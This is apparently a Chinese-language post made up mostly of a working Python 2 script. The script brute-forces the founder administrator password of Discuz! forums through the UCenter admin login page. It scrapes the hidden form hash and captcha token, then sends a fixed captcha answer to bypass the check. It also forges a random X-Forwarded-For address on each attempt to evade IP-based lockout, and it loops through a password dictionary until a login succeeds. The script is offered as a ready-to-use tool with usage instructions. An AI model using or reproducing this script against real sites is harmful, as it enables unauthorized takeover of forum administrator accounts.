Dz论坛创始人无视验证码爆破漏洞利用exp

#!/usr/bin/env python # -*- coding: cp936 -*- #Dz论坛创始人爆破脚本 import httplib import re import random import urllib import time from sys import argv def GetHtml(host,htmlhash,htmlpass,htmlseccode):  ip=str(random.randint(1,100))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))  postHead={"Host":host,"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 ","X-Forwarded-For":ip,'Content-Type':'application/x-www-form-urlencoded','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Connection':'keep-alive'}  postContent='sid=&formhash='+htmlhash+'&seccodehidden='+htmlseccode+'&iframe=0&isfounder=1&password='+htmlpass+'&seccode=cccc&submit=%E7%99%BB+%E5%BD%95'  resultHtml=httplib.HTTPConnection(host)  resultHtml.request('POST','/uc_server/admin.php?m=user&a=login',postContent,postHead )  page=resultHtml.getresponse()  pageConect=page.read()  return pageConect def GetHash(host):  url='http://'+host+'/uc_server/admin.php'  pageContent=urllib.urlopen(url).read()  htmlhash=re.findall('<input type="hidden" name="formhash" value="(.*?)" />',pageContent)  htmlseccode=re.findall('<input type="hidden" name="seccodehidden" value="(.*?)" />',pageContent)  return htmlhash+htmlseccode if(len(argv)==1):  print '             . .............................................. .'  print '             .. ...  ....isssssssssssssssssssssssssr,...   ... '  print '             . . .,,. ..ihSSSSSSSSSSSSSSSSSSSS5S991,. .::, .. .'  print '             . :ishhi,   .i1555555555555555555331,  .:s55hs,  .'  print '             . r15SSShi,   .i15SSSSSSSSSSS5S331:  .:s5SS5S3;  .'  print '             . r1SSSSSShi,   .ihSSSSSSSSSS99h:  .:s5SSSSSSS;  '  print '             . ;sSSSSS33Shi,   ,ihS3333399h:  .:sS33SSSSS3S:  .'  print '             . .;hS33333333hi,   ,r55hhSh;  .:sS33333333S91,. .'  print '             . .,sS3333333333hi,.  .. ..  .:sS333333333S39r.. .'  print '             . ..;5S333333333S31..........,sS3333333333S95, . .'  print '             . ..,13333333333S31..........,1S333333333SS9r .. .'  print '             . ...rS3333333SS991.       ...rS333333333S3S: .. .'  print '             . ...:h33333SS995;. .,;::;:. ..:s5333333SS91.... .'  print '             . ...,sSS3SS995;   ,s5SSSSS1;.   :sS3333S33; ... .'  print '             . ....;533995;   ,r533333333S1;.   :s53398h,.... .'  print '             . .....,i1h;  .,r5333333333333S1;.  .:s51;,..... .'  print '             . .....     ..;53333333333333SS33h;.. ..  ...... .'  print '             . ............,;shS333S33SSS39935s:............. .'  print '             . ............   .,i15S33993S1;,   ............. .'  print '             .                   .ii11i,                     .'  print '                                                                               '  print '                                                                               '  print '                    欢迎使用Dz论坛无视验证码爆破创始人密码工具                     '  print ' 使用说明        |  参数格式—>       host地址      字典文件    '  print '字典放在当前目录 |  参数格式—>      www.xxx.com    pass.txt    ' else:  host=argv[1]  passfile=argv[2]  print '网站host为  '+host  print '密码字典为  '+passfile  print '--->开始破解，请耐心等候才怪'  x=GetHash(host)  for i in open(passfile):   if(GetHtml(host,x[0],i,x[1])==''):    print '密码为 '+i    break